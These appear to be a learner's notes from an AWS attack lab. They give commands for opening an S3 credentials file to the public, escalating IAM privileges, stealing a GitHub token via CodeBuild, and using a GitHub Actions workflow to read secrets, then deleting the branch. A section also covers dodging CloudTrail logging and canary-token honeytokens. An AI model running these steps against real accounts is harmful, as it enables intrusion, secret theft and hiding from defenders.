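aws s3api put-object-acl --bucket <bucket> --key credentials.txt \
  --grant-read uri=http://acs.amazonaws.com/groups/global/AllUsers --no-sign-request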
we can now get the credentials from the file
now we brute-force permissions to see if we have any
we have some lambda permissions
list the functions, check the names and env variables
in one lambda we found some base64 creds
can also try to get function codes
also decode the hint
we will need to compromise the github repo as indicated by the hint
brute-force the permissions again for the new user that we found
this user has simulate permissions, so use them
with this script we can also find the permissions of other users
for the new user we can: list groups, add users to groups, get a federation token
found codebuildadmin group
also simulate the permissions for the group
add our user to the new group (command below)
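As a command (group name comes from the lab output):
aws iam add-user-to-group --group-name <codebuildadmin-group> --user-name <our-user>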
let us get a console view to look at code build permissions
the project has GitHub as its source and is connected to GitHub,
so we need to abuse this
we exfiltrate the token using the codebuild MitM attack
with the token we can now download the repo
git clone https://<token>@github.com/path/to/repo
git checkout -b test -- create a new test branch
cd .github/workflows
here we will find a blank workflow file
we know that from this repo we can access an AWS role which can read the flag
name: 'Hacktricks STS Task'

# Trigger on pushes to our test branch
on:
  push:
    branches:
      - test

# Required to get the ID Token that will be used for OIDC
permissions:
  id-token: write
  contents: read # needed for private repos to checkout

jobs:
  aws:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3
      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v1
        with:
          aws-region: us-east-1
          role-to-assume: arn:aws:iam::755360453888:role/sts-lab-2-target
          role-session-name: OIDCSession
      - run: aws secretsmanager list-secrets
        shell: bash
      - run: aws secretsmanager get-secret-value --secret-id flag_sts_lab_2
        shell: bash
We run these commands one by one because at first we do not know the secret name
git add .
git commit -m "update"
git push --set-upstream origin <test>
owner=rhalyc
repo=ctf
token=<github token>
curl -H "Authorization: token $token"
https://api.github.com/$owner/$repo/actions/runs/$run_id/jobs
check the latest run in from the jobs URL
run_id=<id>
curl -H "Authorization: token $token"
https://api.github.com/$owner/$repo/actions/runs/$run_id/jobs
get job id.
curl -H "Authorization: token $token"
https://api.github.com/$owner/$repo/actions/job/$job_id/logs
we will get the flag in the output
git push origin -d test #remote -- delete our branch
git checkout main
git branch -D test #locally
Cloudtrail
==========================
logs everything inside an AWS account:
who, when, and where
# Check CloudTrail
aws cloudtrail list-trails
aws cloudtrail describe-trails
aws cloudtrail list-public-keys
aws cloudtrail get-event-selectors --trail-name <trail_name>
aws [--region us-east-1] cloudtrail get-trail-status --name [default]
# Get insights
aws cloudtrail get-insight-selectors --trail-name <trail_name>
https://github.com/carlospolop/Cloudtrail2IAM
Demo: create a trail
enter a name
enable for all accounts in the organization or not
create a new or use an existing S3 bucket
check encryption
log file validation
SNS delivery
CloudWatch Logs (optional)
choose log events: management events by default,
data events optional for specific services,
API activity read/write
bypass -- honeytokens
look for services which don't generate CloudTrail logs
<CloudTrail Unsupported Services>
using the leaked keys, try to access resources inside your attacker account,
generating the logs inside our own account
https://github.com/carlospolop/aws_monitor_cloudtrail
Demo: canary tokens
create fake AWS creds using canary tokens
if anyone leaks and uses these creds, we get a detection alert on our webhook
the account id is static for canary tokens
since using them generates logs, we would get caught;
but if we use these creds against a resource in our own account, the alerts/logs land in our account and not the original one, e.g.:
aws --profile canary_profile sns publish --topic-arn arn:aws:sns:us-east-1:<my_account_id>:<topicname> --message hello --region us-east-1
we get an error message, which leaks the original username and account info
guardduty
================